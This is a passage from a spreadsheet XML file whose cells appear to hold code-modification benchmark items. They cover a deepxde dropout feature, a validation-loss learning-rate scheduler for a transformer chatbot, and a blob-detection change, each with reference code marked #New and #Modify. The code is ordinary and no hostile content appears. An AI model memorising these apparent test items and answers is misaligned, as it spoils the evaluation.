print(f"Output: \\n{df}")'}</t>
  </si>
  <si>
    <t>{'#file 1': "import pandas as pd  #New\n\ndef find_blobs(image: xr.DataArray, min_sigma: float, max_sigma: float, num_sigma: int, threshold=0.1) -&gt; pd.DataFrame:  #Modify\n    blobs = blob_log(image, min_sigma=min_sigma, max_sigma=max_sigma, num_sigma=num_sigma, threshold=threshold)\n    blobs[:, 2] = blobs[:, 2] * sqrt(2)\n    df = pd.DataFrame(blobs, columns=['y', 'x', 'r'])  #New\n    return df  #Modify", '#file 2': 'import pandas as pd  #New\n\ndef process(image, detections: pd.DataFrame, add_to_roi_manager=True, multimeasure=True, save_csv=False):  #Modify\n    OvalRoi = sj.jimport(\'ij.gui.OvalRoi\')\n    Overlay = sj.jimport(\'ij.gui.Overlay\')\n    ov = Overlay()\n    imp = ij.py.to_imageplus(image)\n    if add_to_roi_manager:\n        rm = ij.RoiManager.getRoiManager()\n    for i in range(len(detections)):\n        values = detections.iloc[i].tolist()  #Modify\n        y = values[0]\n        x = values[1]\n        r = values[2]\n        d = r * 2\n        roi = OvalRoi(x - r, y - r, d, d)\n        imp.setRoi(roi)\n        ov.add(roi)\n        if add_to_roi_manager:\n            rm.addRoi(roi)\n    imp.setOverlay(ov)\n    imp.show()\n    if rm != None and multimeasure:\n        rm.runCommand(imp, "Measure")\n        if save_csv:\n            detections.to_csv(\'detected_blobs.csv\', index=False)  #New\n        return ij.ResultsTable.getResultsTable()\n    return None', '#file 3': 'detected_blobs = find_blobs(img_xr, min_sigma=0.5, max_sigma=3, num_sigma=10, threshold=0.0075)\n    results_table = process(img, detected_blobs, save_csv=True)  #Modify\n    df = get_dataframe(results_table)\n    print(f"Output: \\n{df}")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'NN class with __init__ method and build method', 'invoking_code_segment': 'MfNN class inheriting from NN and calling _dense method in build method', 'feature_description': 'Add dropout layer to the dense layer in NN base class to improve regularization. The dropout layer will be applied after the dense transformation with a configurable dropout rate parameter.', 'modified_complete_code': '# File 1: deepxde/deepxde/nn/tensorflow_compat_v1/nn.py\nimport numpy as np\nfrom ... import config\nfrom ...backend import tf\nfrom ...utils import make_dict, timing\n\nclass NN:\n    """Base class for all neural network modules."""\n\n    def __init__(self):\n        self.training = tf.placeholder(tf.bool)\n        self.regularizer = None\n        self.regularization_loss = 0\n        self._auxiliary_vars = tf.placeholder(config.real(tf), [None, None])\n        self._input_transform = None\n        self._output_transform = None\n        self._built = False\n        #New: Add dropout rate parameter\n        self.dropout_rate = 0.0\n\n    @property\n    def inputs(self):\n        """Return the net inputs (placeholders)."""\n\n    @property\n    def outputs(self):\n        """Return the net outputs (tf.Tensor)."""\n\n    @property\n    def targets(self):\n        """Return the targets of the net outputs (placeholders)."""\n\n    @property\n    def auxiliary_vars(self):\n        """Return additional variables needed (placeholders)."""\n        return self._auxiliary_vars\n\n    @property\n    def built(self):\n        return self._built\n\n    @built.setter\n    def built(self, value):\n        self._built = value\n\n    def feed_dict(self, training, inputs, targets=None, auxiliary_vars=None):\n        """Construct a feed_dict to feed values to TensorFlow placeholders."""\n        feed_dict = {self.training: training}\n        feed_dict.update(self._feed_dict_inputs(inputs))\n        if targets is not None:\n            feed_dict.update(self._feed_dict_targets(targets))\n        if auxiliary_vars is not None:\n            feed_dict.update(self._feed_dict_auxiliary_vars(auxiliary_vars))\n        return feed_dict\n\n    def _feed_dict_inputs(self, inputs):\n        return make_dict(self.inputs, inputs)\n\n    def _feed_dict_targets(self, targets):\n        return make_dict(self.targets, targets)\n\n    def _feed_dict_auxiliary_vars(self, auxiliary_vars):\n        return make_dict(self.auxiliary_vars, auxiliary_vars)\n\n    def apply_feature_transform(self, transform):\n        """Compute the features by appling a transform to the network inputs, i.e., features = transform(inputs). Then, outputs = network(features)."""\n        self._input_transform = transform\n\n    def apply_output_transform(self, transform):\n        """Apply a transform to the network outputs, i.e., outputs = transform(inputs, outputs)."""\n        self._output_transform = transform\n\n    #New: Add method to set dropout rate\n    def set_dropout_rate(self, dropout_rate):\n        """Set the dropout rate for regularization."""\n        self.dropout_rate = dropout_rate\n\n    def num_trainable_parameters(self):\n        """Evaluate the number of trainable parameters for the NN."""\n        return np.sum(\n            [np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()]\n        )\n\n    @timing\n    def build(self):\n        """Construct the network."""\n        self.built = True\n\n# File 2: deepxde/deepxde/nn/tensorflow_compat_v1/mfnn.py\nfrom .nn import NN\nfrom .. import activations\nfrom .. import initializers\nfrom .. import regularizers\nfrom ... import config\nfrom ...backend import tf\nfrom ...utils import timing\n\nclass MfNN(NN):\n    """Multifidelity neural networks."""\n\n    def __init__(\n        self,\n        layer_sizes_low_fidelity,\n        layer_sizes_high_fidelity,\n        activation,\n        kernel_initializer,\n        regularization=None,\n        residue=False,\n        trainable_low_fidelity=True,\n        trainable_high_fidelity=True,\n        #New: Add dropout_rate parameter\n        dropout_rate=0.0,\n    ):\n        super().__init__()\n        self.layer_size_lo = layer_sizes_low_fidelity\n        self.layer_size_hi = layer_sizes_high_fidelity\n        self.activation = activations.get(activation)\n        self.kernel_initializer = initializers.get(kernel_initializer)\n        self.regularizer = regularizers.get(regularization)\n        self.residue = residue\n        self.trainable_lo = trainable_low_fidelity\n        self.trainable_hi = trainable_high_fidelity\n        #New: Set dropout rate from parameter\n        self.set_dropout_rate(dropout_rate)\n\n    @property\n    def inputs(self):\n        return self.X\n\n    @property\n    def outputs(self):\n        return [self.y_lo, self.y_hi]\n\n    @property\n    def targets(self):\n        return [self.target_lo, self.target_hi]\n\n    @timing\n    def build(self):\n        print("Building multifidelity neural network...")\n        self.X = tf.placeholder(config.real(tf), [None, self.layer_size_lo[0]])\n\n        # Low fidelity\n        y = self.X\n        for i in range(len(self.layer_size_lo) - 2):\n            y = self._dense(\n                y,\n                self.layer_size_lo[i + 1],\n                activation=self.activation,\n                regularizer=self.regularizer,\n                trainable=self.trainable_lo,\n            )\n        self.y_lo = self._dense(\n            y,\n            self.layer_size_lo[-1],\n            regularizer=self.regularizer,\n            trainable=self.trainable_lo,\n        )\n\n        # High fidelity\n        X_hi = tf.concat([self.X, self.y_lo], 1)\n        # Linear\n        y_hi_l = self._dense(X_hi, self.layer_size_hi[-1], trainable=self.trainable_hi)\n        # Nonlinear\n        y = X_hi\n        for i in range(len(self.layer_size_hi) - 1):\n            y = self._dense(\n                y,\n                self.layer_size_hi[i],\n                activation=self.activation,\n                regularizer=self.regularizer,\n                trainable=self.trainable_hi,\n            )\n        y_hi_nl = self._dense(\n            y,\n            self.layer_size_hi[-1],\n            use_bias=False,\n            regularizer=self.regularizer,\n            trainable=self.trainable_hi,\n        )\n        # Linear + nonlinear\n        if not self.residue:\n            alpha = tf.Variable(0, dtype=config.real(tf), trainable=self.trainable_hi)\n            alpha = activations.get("tanh")(alpha)\n            self.y_hi = y_hi_l + alpha * y_hi_nl\n        else:\n            alpha1 = tf.Variable(0, dtype=config.real(tf), trainable=self.trainable_hi)\n            alpha1 = activations.get("tanh")(alpha1)\n            alpha2 = tf.Variable(0, dtype=config.real(tf), trainable=self.trainable_hi)\n            alpha2 = activations.get("tanh")(alpha2)\n            self.y_hi = self.y_lo + 0.1 * (alpha1 * y_hi_l + alpha2 * y_hi_nl)\n\n        self.target_lo = tf.placeholder(config.real(tf), [None, self.layer_size_lo[-1]])\n        self.target_hi = tf.placeholder(config.real(tf), [None, self.layer_size_hi[-1]])\n        self.built = True\n\n    #Modify: Updated _dense method to include dropout\n    def _dense(\n        self,\n        inputs,\n        units,\n        activation=None,\n        use_bias=True,\n        regularizer=None,\n        trainable=True,\n    ):\n        #New: Apply dense layer\n        output = tf.layers.dense(\n            inputs,\n            units,\n            activation=activation,\n            use_bias=use_bias,\n            kernel_initializer=self.kernel_initializer,\n            kernel_regularizer=regularizer,\n            trainable=trainable,\n        )\n        #New: Apply dropout if dropout_rate &gt; 0\n        if self.dropout_rate &gt; 0:\n            output = tf.layers.dropout(output, rate=self.dropout_rate, training=self.training)\n        return output'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def _dense(self, inputs, units, activation=None, use_bias=True, regularizer=None, trainable=True, dropout_rate=0.0):\n    #Modify\n    y = tf.layers.dense(\n        inputs,\n        units,\n        activation=activation,\n        use_bias=use_bias,\n        kernel_initializer=self.kernel_initializer,\n        kernel_regularizer=regularizer,\n        trainable=trainable,\n    )\n    if dropout_rate &gt; 0.0:\n        y = tf.layers.dropout(y, rate=dropout_rate, training=self.training)\n    return y', '#file 2': 'y = self.X\nfor i in range(len(self.layer_size_lo) - 2):\n    y = self._dense(\n        y,\n        self.layer_size_lo[i + 1],\n        activation=self.activation,\n        regularizer=self.regularizer,\n        trainable=self.trainable_lo,\n        dropout_rate=0.5  # New\n    )\nself.y_lo = self._dense(\n    y,\n    self.layer_size_lo[-1],\n    regularizer=self.regularizer,\n    trainable=self.trainable_lo,\n    dropout_rate=0.5  # New\n)', '#file 3': 'X_hi = tf.concat([self.X, self.y_lo], 1)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class NoamOpt in transformer_chatbot/model/optim.py - the __init__, step, and rate methods', 'invoking_code_segment': 'Trainer class initialization and train method in transformer_chatbot/model/trainer.py, and main function in transformer_chatbot/train.py', 'feature_description': 'Add a learning rate scheduler that reduces the learning rate by a factor of 0.5 if the validation loss does not improve for 3 consecutive epochs. This feature monitors validation loss across epochs and applies learning rate decay when no improvement is detected.', 'modified_complete_code': '#File 1: transformer_chatbot/model/optim.py\n\nimport math\nimport torch\n\nclass Adam(torch.optim.Optimizer):\n    """Implements Adam algorithm.\n    This implementation is modified from torch.optim.Adam based on:\n    `Fixed Weight Decay Regularization in Adam`\n    (see https://arxiv.org/abs/1711.05101)\n    It has been proposed in `Adam: A Method for Stochastic Optimization`_.\n    Arguments:\n        params (iterable): iterable of parameters to optimize or dicts defining\n            parameter groups\n        lr (float, optional): learning rate (default: 1e-3)\n        betas (Tuple[float, float], optional): coefficients used for computing\n            running averages of gradient and its square (default: (0.9, 0.999))\n        eps (float, optional): term added to the denominator to improve\n            numerical stability (default: 1e-8)\n        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n        amsgrad (boolean, optional): whether to use the AMSGrad variant of this\n            algorithm from the paper `On the Convergence of Adam and Beyond`_\n    .. _Adam\\: A Method for Stochastic Optimization:\n        https://arxiv.org/abs/1412.6980\n    .. _On the Convergence of Adam and Beyond:\n        https://openreview.net/forum?id=ryQu7f-RZ\n    """\n\n    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, amsgrad=False):\n        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay, amsgrad=amsgrad)\n        super(Adam, self).__init__(params, defaults)\n\n    def step(self, closure=None):\n        """Performs a single optimization step.\n        Arguments:\n            closure (callable, optional): A closure that reevaluates the model\n                and returns the loss.\n        """\n        loss = None\n        if closure is not None:\n            loss = closure()\n\n        for group in self.param_groups:\n            for p in group[\'params\']:\n                if p.grad is None:\n                    continue\n                grad = p.grad.data\n                if grad.is_sparse:\n                    raise RuntimeError(\'Adam does not support sparse gradients, please consider SparseAdam instead\')\n                amsgrad = group[\'amsgrad\']\n\n                state = self.state[p]\n\n                # State initialization\n                if len(state) == 0:\n                    state[\'step\'] = 0\n                    # Exponential moving average of gradient values\n                    state[\'exp_avg\'] = torch.zeros_like(p.data)\n                    # Exponential moving average of squared gradient values\n                    state[\'exp_avg_sq\'] = torch.zeros_like(p.data)\n                    if amsgrad:\n                        # Maintains max of all exp. moving avg. of sq. grad. values\n                        state[\'max_exp_avg_sq\'] = torch.zeros_like(p.data)\n\n                exp_avg, exp_avg_sq = state[\'exp_avg\'], state[\'exp_avg_sq\']\n                if amsgrad:\n                    max_exp_avg_sq = state[\'max_exp_avg_sq\']\n                beta1, beta2 = group[\'betas\']\n\n                state[\'step\'] += 1\n\n                # Decay the first and second moment running average coefficient\n                exp_avg.mul_(beta1).add_(1 - beta1, grad)\n                exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n                if amsgrad:\n                    # Maintains the maximum of all 2nd moment running avg. till now\n                    torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)\n                    # Use the max. for normalizing running avg. of gradient\n                    denom = max_exp_avg_sq.sqrt().add_(group[\'eps\'])\n                else:\n                    denom = exp_avg_sq.sqrt().add_(group[\'eps\'])\n\n                bias_correction1 = 1 - beta1 ** state[\'step\']\n                bias_correction2 = 1 - beta2 ** state[\'step\']\n                step_size = group[\'lr\'] * math.sqrt(bias_correction2) / bias_correction1\n\n                if group[\'weight_decay\'] != 0:\n                    p.data.add_(-group[\'weight_decay\'] * group[\'lr\'], p.data)\n\n                p.data.addcdiv_(-step_size, exp_avg, denom)\n\n        return loss\n\n\nclass NoamOpt:\n    def __init__(self, embeddings_size, factor, warmup, optimizer):\n        self.embeddings_size = embeddings_size\n        self.factor = factor\n        self.warmup = warmup\n        self.optimizer = optimizer\n\n        self._step = 0\n        #New: Add learning rate scheduler state\n        self.best_loss = None\n        self.patience_counter = 0\n        self.patience = 3\n        self.lr_decay_factor = 0.5\n        \n    def state_dict(self):\n        return {\'step\': self._step,\n                \'optimizer\': self.optimizer.state_dict(),\n                #New: Include scheduler state in checkpoint\n                \'best_loss\': self.best_loss,\n                \'patience_counter\': self.patience_counter}\n\n    def load_state_dict(self, state_dict):\n        self._step = state_dict[\'step\']\n        self.optimizer.load_state_dict(state_dict[\'optimizer\'])\n        #New: Load scheduler state from checkpoint\n        if \'best_loss\' in state_dict:\n            self.best_loss = state_dict[\'best_loss\']\n            self.patience_counter = state_dict[\'patience_counter\']\n\n    def zero_grad(self):\n        return self.optimizer.zero_grad()\n\n    @property\n    def param_groups(self):\n        return self.optimizer.param_groups\n\n    def step(self):\n        self._step += 1\n        rate = self.rate()\n        for p in self.optimizer.param_groups:\n            p[\'lr\'] = rate\n        self.optimizer.step()\n    \n    #New: Add method to update learning rate based on validation loss\n    def step_scheduler(self, val_loss):\n        """Update learning rate based on validation loss improvement.\n        Reduces learning rate by lr_decay_factor if validation loss does not improve for patience epochs.\n        """\n        if self.best_loss is None:\n            self.best_loss = val_loss\n        elif val_loss &lt; self.best_loss:\n            self.best_loss = val_loss\n            self.patience_counter = 0\n        else:\n            self.patience_counter += 1\n            if self.patience_counter &gt;= self.patience:\n                # Apply learning rate decay\n                for param_group in self.optimizer.param_groups:\n                    param_group[\'lr\'] *= self.lr_decay_factor\n                self.patience_counter = 0\n                print(f\'Learning rate reduced by factor {self.lr_decay_factor}. New base lr: {param_group["lr"]}\')\n        \n    def rate(self, step=None):\n        if step is None:\n            step = self._step\n            \n        return self.factor * (self.embeddings_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5)))\n\n\n#File 2: transformer_chatbot/model/trainer.py\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom .utils import pad_sequence\nfrom .optim import Adam, NoamOpt\nfrom .loss import LabelSmoothingLoss\n\n\nclass Trainer:\n    def __init__(self, model, train_dataset, test_dataset=None, batch_size=8,\n                 batch_split=1, lm_weight=0.5, risk_weight=0, lr=6.25e-5, lr_warmup=2000, \n                 n_jobs=0, clip_grad=None, label_smoothing=0, device=torch.device(\'cuda\'),\n                 ignore_idxs=[]):\n        self.model = model.to(device)\n        self.lm_criterion = nn.CrossEntropyLoss(ignore_index=self.model.padding_idx).to(device)\n        self.criterion = LabelSmoothingLoss(n_labels=self.model.n_embeddings, smoothing=label_smoothing, ignore_index=self.model.padding_idx).to(device)\n        base_optimizer = Adam(self.model.parameters(), lr=lr, weight_decay=0.01)\n        self.optimizer = NoamOpt(self.model.embeddings_size, lr, lr_warmup, base_optimizer)\n\n        self.train_dataloader = DataLoader(train_dataset, batch_size=batch_size//batch_split, shuffle=True, \n                                           num_workers=n_jobs, collate_fn=self.collate_func)\n        if test_dataset is not None:\n            self.test_dataloader = DataLoader(test_dataset, batch_size=batch_size//batch_split, shuffle=False, \n                                            num_workers=n_jobs, collate_fn=self.collate_func)\n\n        self.batch_split = batch_split\n        self.lm_weight = lm_weight\n        self.risk_weight = risk_weight\n        self.clip_grad = clip_grad\n        self.device = device\n        self.ignore_idxs = ignore_idxs\n        #New: Track validation loss for scheduler\n        self.last_val_loss = None\n\n    def state_dict(self):\n        return {\'model\': self.model.state_dict(),\n                \'optimizer\': self.optimizer.state_dict()}\n\n    def load_state_dict(self, state_dict):\n        self.model.load_state_dict(state_dict[\'model\'], strict=False)\n        self.optimizer.load_state_dict(state_dict[\'optimizer\'])\n\n    def collate_func(self, data):\n        persona_info, h, y = zip(*data)\n\n        contexts = []\n\n        if max(map(len, persona_info)) &gt; 0:\n            persona_info = [torch.tensor(d, dtype=torch.long) for d in persona_info]\n            persona_info = pad_sequence(persona_info, batch_first=True, padding_value=self.model.padding_idx)\n            contexts.append(persona_info)\n\n        if max(map(len, h)) &gt; 0:\n            h = [torch.tensor(d, dtype=torch.long) for d in h]\n            h = pad_sequence(h, batch_first=True, padding_value=self.model.padding_idx)\n            contexts.append(h)\n    \n        y = [torch.tensor(d, dtype=torch.long) for d in y]\n        y = pad_sequence(y, batch_first=True, padding_value=self.model.padding_idx)\n\n        return contexts, y\n\n    def _eval_train(self, epoch, risk_func=None):\n        self.model.train()\n\n        tqdm_data = tqdm(self.train_dataloader, desc=\'Train (epoch #{})\'.format(epoch))\n        loss = 0\n        lm_loss = 0\n        risk_loss = 0\n        for i, (contexts, targets) in enumerate(tqdm_data):\n            contexts, targets = [c.to(self.device) for c in contexts], targets.to(self.device)\n            \n            enc_contexts = []\n\n            # lm loss\n            batch_lm_loss = torch.tensor(0, dtype=torch.float, device=self.device)\n            for context in contexts:\n                enc_context = self.model.encode(context.clone())\n                enc_contexts.append(enc_context)\n                \n                if self.lm_weight &gt; 0:\n                    context_outputs = self.model.generate(enc_context[0])\n                    ignore_mask = torch.stack([context == idx for idx in self.ignore_idxs], dim=-1).any(dim=-1)\n                    context.masked_fill_(ignore_mask, self.model.padding_idx)\n                    prevs, nexts = context_outputs[:, :-1, :].contiguous(), context[:, 1:].contiguous()\n                    batch_lm_loss += (self.lm_criterion(prevs.view(-1, prevs.shape[-1]), nexts.view(-1)) / len(contexts))\n\n            # s2s loss\n            prevs, nexts = targets[:, :-1].contiguous(), targets[:, 1:].contiguous()\n            outputs = self.model.decode(prevs, enc_contexts)\n            outputs = F.log_softmax(outputs, dim=-1)\n            batch_loss = self.criterion(outputs.view(-1, outputs.shape[-1]), nexts.view(-1))\n            \n            # risk loss\n            batch_risk_loss = torch.tensor(0, dtype=torch.float, device=self.device)\n            if risk_func is not None and self.risk_weight &gt; 0:\n\n                beams, beam_lens = self.model.beam_search(enc_contexts, return_beams=True)\n\n                target_lens = targets.ne(self.model.padding_idx).sum(dim=-1)\n                targets = [target[1:length-1].tolist() for target, length in zip(targets, target_lens)]\n                batch_risks = []\n                for b in range(beams.shape[1]):\n                    predictions = [b[1:l-1].tolist() for b, l in zip(beams[:, b, :], beam_lens[:, b])]\n                    risks = torch.tensor(risk_func(predictions, targets), dtype=torch.float, device=self.device)\n                    batch_risks.append(risks)\n                batch_risks = torch.stack(batch_risks, dim=-1)\n\n                batch_probas = []\n                for b in range(beams.shape[1]):\n                    logits = self.model.decode(beams[:, b, :-1], enc_contexts)\n                    probas = F.log_softmax(logits, dim=-1)\n                    probas = torch.gather(probas, -1, beams[:, b, 1:].unsqueeze(-1)).squeeze(-1)\n                    probas = probas.sum(dim=-1) / beam_lens[:, b].float()\n                    batch_probas.append(probas)\n                batch_probas = torch.stack(batch_probas, dim=-1)\n                batch_probas = F.softmax(batch_probas, dim=-1)\n                \n                batch_risk_loss = torch.mean((batch_risks * batch_probas).sum(dim=-1))\n            \n            # optimization\n            full_loss = (batch_lm_loss * self.lm_weight + self.risk_weight * batch_risk_loss + batch_loss) / self.batch_split\n            full_loss.backward()\n            \n            if (i + 1) % self.batch_split == 0:\n                if self.clip_grad is not None:\n                    for group in self.optimizer.param_groups:\n                        nn.utils.clip_grad_norm_(group[\'params\'], self.clip_grad)\n\n                self.optimizer.step()\n                self.optimizer.zero_grad()\n\n            lm_loss = (i * lm_loss + batch_lm_loss.item()) / (i + 1)\n            loss = (i * loss + batch_loss.item()) / (i + 1)\n            risk_loss = (i * risk_loss + batch_risk_loss.item()) / (i + 1)\n\n            tqdm_data.set_postfix({\'lm_loss\': lm_loss, \'loss\': loss, \'risk_loss\': risk_loss})\n\n    def _eval_test(self, metric_funcs={}):\n        self.model.eval()\n\n        tqdm_data = tqdm(self.test_dataloader, desc=\'Test\')\n        loss = 0\n        lm_loss = 0\n        metrics = {name: 0 for name in metric_funcs.keys()}\n        for i, (contexts, targets) in enumerate(tqdm_data):\n            contexts, targets = [c.to(self.device) for c in contexts], targets.to(self.device)\n            \n            enc_contexts = []\n\n            # lm loss\n            batch_lm_loss = torch.tensor(0, dtype=torch.float, device=self.device)\n            for context in contexts:\n                enc_context = self.model.encode(context.clone())\n                enc_contexts.append(enc_context)\n\n                if self.lm_weight &gt; 0:\n                    context_outputs = self.model.generate(enc_context[0])\n                    ignore_mask = torch.stack([context == idx for idx in self.ignore_idxs], dim=-1).any(dim=-1)\n                    context.masked_fill_(ignore_mask, self.model.padding_idx)\n                    prevs, nexts = context_outputs[:, :-1, :].contiguous(), context[:, 1:].contiguous()\n                    batch_lm_loss += (self.lm_criterion(prevs.view(-1, prevs.shape[-1]), nexts.view(-1)) / len(contexts))\n\n            # s2s loss\n            prevs, nexts = targets[:, :-1].contiguous(), targets[:, 1:].contiguous()\n            outputs = self.model.decode(prevs, enc_contexts)\n            outputs = F.log_softmax(outputs, dim=-1)\n            batch_loss = self.criterion(outputs.view(-1, outputs.shape[-1]), nexts.view(-1))\n            \n            predictions = self.model.beam_search(enc_contexts)\n            target_lens = targets.ne(self.model.padding_idx).sum(dim=-1)\n            targets = [t[1:l-1].tolist() for t, l in zip(targets, target_lens)]\n            \n            lm_loss = (i * lm_loss + batch_lm_loss.item()) / (i + 1)\n            loss = (i * loss + batch_loss.item()) / (i + 1)\n            for name, func in metric_funcs.items():\n                score = func(predictions, targets)\n                metrics[name] = (metrics[name] * i + score) / (i + 1)\n\n            tqdm_data.set_postfix(dict({\'lm_loss\': lm_loss, \'loss\': loss}, **metrics))\n        \n        #Modify: Return validation loss for scheduler\n        return loss\n    \n    def test(self, metric_funcs={}):\n        if hasattr(self, \'test_dataloader\'):\n            #Modify: Capture validation loss\n            val_loss = self._eval_test(metric_funcs)\n            return val_loss\n\n    def train(self, epochs, after_epoch_funcs=[], risk_func=None):\n        for epoch in range(epochs):\n            self._eval_train(epoch, risk_func)\n\n            #New: Call scheduler step after validation\n            val_loss = self.test()\n            if val_loss is not None:\n                self.optimizer.step_scheduler(val_loss)\n\n            for func in after_epoch_funcs:\n                func(epoch)\n\n\n#File 3: transformer_chatbot/train.py (modifications in main function)\n\nimport torch\nimport random\nfrom model.utils import load_openai_weights, set_seed, f1_score\nfrom model.transformer_model import TransformerModel\nfrom model.trainer import Trainer\nfrom model.text import BPEVocab\nfrom model.dataset import FacebookDataset\nfrom config import get_model_config, get_trainer_config\n\n\ndef main():\n    model_config = get_model_config()\n    trainer_config = get_trainer_config()\n\n    set_seed(trainer_config.seed)\n    device = torch.device(trainer_config.device)\n\n    vocab = BPEVocab.from_files(model_config.bpe_vocab_path, model_config.bpe_codes_path)\n\n    transformer = TransformerModel(n_layers=model_config.n_layers,\n                                   n_embeddings=len(vocab),\n                                   n_pos_embeddings=model_config.n_pos_embeddings,\n                                   embeddings_size=model_config.embeddings_size,\n                                   padding_idx=vocab.pad_id,\n                                   n_heads=model_config.n_heads,\n                                   dropout=model_config.dropout,\n                                   embed_dropout=model_config.embed_dropout,\n                                   attn_dropout=model_config.attn_dropout,\n                                   ff_dropout=model_config.ff_dropout,\n                                   bos_id=vocab.bos_id,\n                                   eos_id=vocab.eos_id,\n                                   max_seq_len=model_config.max_seq_len,\n                                   beam_size=model_config.beam_size,  \n                                   length_penalty=model_config.length_penalty,\n                                   n_segments=model_config.n_segments,\n                                   annealing_topk=model_config.annealing_topk,\n                                   annealing=model_config.annealing,\n                                   diversity_coef=model_config.diversity_coef,\n                                   diversity_groups=model_config.diversity_groups)\n\n    if not trainer_config.load_last:\n        load_openai_weights(transformer.transformer_module, \n                            trainer_config.openai_parameters_dir,\n                            n_special_tokens=vocab.n_special_tokens)\n        print(\'OpenAI weights loaded from {}\'.format(trainer_config.openai_parameters_dir))\n\n    train_dataset = FacebookDataset(trainer_config.train_datasets, vocab, transformer.n_pos_embeddings - 1)\n    test_dataset = FacebookDataset(trainer_config.test_datasets, vocab, transformer.n_pos_embeddings - 1)\n\n    model_trainer = Trainer(transformer,\n                            train_dataset, \n                            test_dataset, \n                            batch_size=trainer_config.batch_size,\n                            batch_split=trainer_config.batch_split, \n                            lr=trainer_config.lr, \n                            lr_warmup=trainer_config.lr_warmup, \n                            lm_weight=trainer_config.lm_weight,\n                            risk_weight=trainer_config.risk_weight, \n                            n_jobs=trainer_config.n_jobs, \n                            clip_grad=trainer_config.clip_grad, \n                            device=device,\n                            ignore_idxs=vocab.special_tokens_ids)\n\n    if trainer_config.load_last:\n        state_dict = torch.load(trainer_config.last_checkpoint_path, map_location=device)\n        model_trainer.load_state_dict(state_dict)\n        print(\'Weights loaded from {}\'.format(trainer_config.last_checkpoint_path))\n    \n\n    # helpers -----------------------------------------------------\n    def save_func(epoch):\n        torch.save(model_trainer.state_dict(), trainer_config.last_checkpoint_path)  \n\n    def sample_text_func(epoch):\n        n_samples = 5\n        samples_idxs = random.sample(range(len(test_dataset)), n_samples)\n        samples = [test_dataset[idx] for idx in samples_idxs]\n        for persona_info, dialog, target in samples:\n            contexts = [torch.tensor([c], dtype=torch.long, device=model_trainer.device) for c in [persona_info, dialog] if len(c) &gt; 0]\n            prediction = model_trainer.model.predict(contexts)[0]\n            \n            persona_info_str = vocab.ids2string(persona_info[1:-1])\n            dialog_str = vocab.ids2string(dialog)\n            dialog_str = dialog_str.replace(vocab.talker1_bos, \'\\n\\t- \').replace(vocab.talker2_bos, \'\\n\\t- \')\n            dialog_str = dialog_str.replace(vocab.talker1_eos, \'\').replace(vocab.talker2_eos, \'\')\n            target_str = vocab.ids2string(target[1:-1])\n            prediction_str = vocab.ids2string(prediction)\n\n            print(\'\\n\')\n            print(\'Persona info:\\n\\t{}\'.format(persona_info_str))\n            print(\'Dialog:{}\'.format(dialog_str))\n            print(\'Target:\\n\\t{}\'.format(target_str))\n            print(\'Prediction:\\n\\t{}\'.format(prediction_str))\n\n    def test_func(epoch):\n        if (epoch+1) % trainer_config.test_period == 0:\n            metric_funcs = {\'f1_score\': f1_score}\n            model_trainer.test(metric_funcs)\n    \n    def f1_risk(predictions, targets):\n        scores = f1_score(predictions, targets, average=False)\n        return [1-s for s in scores] \n\n    # helpers -----------------------------------------------------\n    \n\n    try:\n        #Modify: train method now calls scheduler internally\n        model_trainer.train(trainer_config.n_epochs, after_epoch_funcs=[save_func, sample_text_func, test_func], risk_func=f1_risk)\n    except (KeyboardInterrupt, Exception, RuntimeError) as e:\n        torch.save(model_trainer.state_dict(), trainer_config.interrupt_checkpoint_path)\n        raise e\n\n\nif __name__ == \'__main__\':\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': "import math\nimport torch\n\nclass Adam(torch.optim.Optimizer):\n    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, amsgrad=False):\n        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay, amsgrad=amsgrad)\n        super(Adam, self).__init__(params, defaults)\n\n    def step(self, closure=None):\n        loss = None\n        if closure is not None:\n            loss = closure()\n\n        for group in self.param_groups:\n            for p in group['params']:\n                if p.grad is None:\n                    continue\n                grad = p.grad.data\n                if grad.is_sparse:\n                    raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')\n                amsgrad = group['amsgrad']\n\n                state = self.state[p]\n\n                # State initialization\n                if len(state) == 0:\n                    state['step'] = 0\n                    # Exponential moving average of gradient values\n                    state['exp_avg'] = torch.zeros_like(p.data)\n                    # Exponential moving average of squared gradient values\n                    state['exp_avg_sq'] = torch.zeros_like(p.data)\n                    if amsgrad:\n                        # Maintains max of all exp. moving avg. of sq. grad. values\n                        state['max_exp_avg_sq'] = torch.zeros_like(p.data)\n\n                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n                if amsgrad:\n                    max_exp_avg_sq = state['max_exp_avg_sq']\n                beta1, beta2 = group['betas']\n\n                state['step'] += 1\n\n                # Decay the first and second moment running average coefficient\n                exp_avg.mul_(beta1).add_(1 - beta1, grad)\n                exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n                if amsgrad:\n                    # Maintains the maximum of all 2nd moment running avg. till now\n                    torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)\n                    # Use the max. for normalizing running avg. of gradient\n                    denom = max_exp_avg_sq.sqrt().add_(group['eps'])\n                else:\n                    denom = exp_avg_sq.sqrt().add_(group['eps'])\n\n                bias_correction1 = 1 - beta1 ** state['step']\n                bias_correction2 = 1 - beta2 ** state['step']\n                step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1\n\n                if group['weight_decay'] != 0:\n                    p.data.add_(-group['weight_decay'] * group['lr'], p.data)\n\n                p.data.addcdiv_(-step_size, exp_avg, denom)\n\n        return loss\n\n#Modify: Add learning rate scheduler\nclass NoamOpt:\n    def __init__(self, embeddings_size, factor, warmup, optimizer):\n        self.embeddings_size = embeddings_size\n    